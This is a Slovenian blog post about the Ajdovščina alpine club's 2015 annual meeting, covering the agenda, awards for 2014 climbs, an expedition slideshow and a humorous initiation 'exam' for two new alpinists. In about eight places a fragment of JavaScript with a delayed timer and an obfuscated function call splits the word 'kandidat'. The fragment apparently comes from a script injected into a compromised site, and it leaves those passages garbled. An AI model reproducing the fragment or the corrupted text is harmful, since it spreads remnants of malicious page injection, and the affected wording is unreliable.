Občni zbor 2015

Written by Marijan

January 10, 2015

V soboto 10.1. je v taborniškem domu na Kovku potekal že 13. občni zbor Alpinistične sekcije PD Ajdovščina.
Glede na to, da je bilo za Ajdovske alpiniste leto 2014, precej bogato in pestro, se je obetalo dobro srečanje širše vipavske alpinistične in ostale  javnosti.
Zbor se je neuradno začel okrog 19h zvečer, s pokušino pasulja in vinskih dobrot (zaslužna kandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andidata za alpinista, oziroma njihove boljše polovice).

Uradni del smo s 50 minutno zamudo začeli ob 20.50. Tokrat sem se kot načelnik, ki imam to čast, da suhoparno podajam dosežke in ostalo dogajanje alpinistične kolektiva skozi preteklo leto, odločil, da govor prenesem na power point in lahko ostali (tudi strici iz ozdaja), sproti komentirajo in izražajo svoja mnenja, predvsem, pa jim za razumevanje povedanega, ni potrebno poslušati le mene…
Uradni del je potekal po dnevnem redu:

– mnenje načelnika o delovanju alpinistične sekcije (zelo pozitivno)
– pregled vzponov in dela v pretekli sezoni in diskusija (izpolnjeno 85% zastavljenega)
– pregled izvajanja alpinistične šole (zaključena 13/14 ter v izvajanju AŠ 14/15)
– kandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andidati za alpinističnega inštruktorja
– ostali plezalni načrti, tabori, tekme, tečaji, odprave…v letu 2015
– podelitev nagrad za naj vzpone v letu 2014 po kategorijah:

Največ vzponov: Barbi Močivnik (31 alpinističnih vzponov)

Najtežji vzponi: Tine Andrejašič (Slap La Piovra , Kamniška smer v Koglu, smer JLA v Šitah…)

Najbližje soncu: Dean Strosar (Mount Korona, 4860 m)

Najtežji športno plezalni vzpon: Vid Štrancar (Sun Ra – 7c, Vipavska Bela – solo vzpon, B.I.G.- 7B+, boulder problem na Podrti Gori)

Nagrada za posebne dosežke: Matic Štrancar (veliko kvalitetnih, tudi solo vzponov in ostalo prizadevno delovanje v korist sekcije…)

Zahvala: Marijanu Močivniku in Studiu-Ajd za tehnično podporo pri postavitvi spletne strani ao-ajdovscina.si, ter odlično fotografsko gradivo.

4. – Kulturni del – kratka predstavitev Alpinistične odprave Kirgizija 2014 (Dean Strosar) in projekcija – odlična fotografska mojstrovina Marijana Močivnika “AS Ajdovščina v 2014”, ujeta v objektiv mojstra.

5. Izpit za alpinista kandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andidata (Egon Pavlica in Dean Strosar).
Kot veleva tradicija mora vsakdo, ki opravi državni izpit za alpinista le tega zagovarjati tudi pred domačo komisijo, ki jo sestavljajo že biksani pripadniki odseka z opravljenim izpitom. Komisija v postavi inštruktor Simon ter David, Boštjan in Ožbej je kandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andidata Egona in Deana soočila z zanimivimi vprašanji in izzivi. Izpostaviti je potrebno, da je izpit s svojo prisotnostjo slavnostno počastil emninenca svetovnega alpinizma, sam Reinhold Messner, ki je sodeloval tudi kot častni član prej omenjene komisije. Kandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andidata sta poleg šibkega poznavanja slovenske himalajske zgodovine, in najnižjih slovenskih 2000-akov, nekaj več znanja pokazala pri računanju faktorja padca, pantomimi v viharnih razmerah sredi stene, ter vezanju kravatnega vozla. Člani komisije, tudi Messner, smo se končno odločili, da po prestanem biksanju, kandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andidata dobita čast, postati polnopravna Ajdovska alpinista. Čestitke fanta, in upam, da vama bo naše darilo, Velikani Himalaje, pomagalo bolje spoznati slovenski himalajizem in morda zbudilo kakšno…skrito misel…Srečno!

Po zaključku, občutek sem imel, kar zanimivega uradnega dela, je bil na vrsti pravi alpinistični žur, za katerega sta poskrbela omenjena kandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andidata, takrat že polnopravna alpinista. Obljubljala sta light show, muziko, ples…nič ni ostalo samo pri besedah…kočo smo zapuščali naslednji popoldan.

Nekaj dogajanja iz uradnega dela, je zabeleženo v spodnji galeriji.

Boštjan

Categories

Archives

You May Also Like…

Hvar Climb and Sail

Hvar Climb and Sail

Premierni climb and sail alpinističnega odseka Ajdovščina je uspešno za nami! Težko je zbrati vsa čustva v samostojni...

Prvomajska Sardinija

Prvomajska Sardinija

Kje in Kdaj: Sardinija (Dorgali, Santa Maria Navarrese), 26.4.-7.5. Kdo: Luka Batagelj, Stiven Kocijančič, Sašo...

0 Comments

Submit a Comment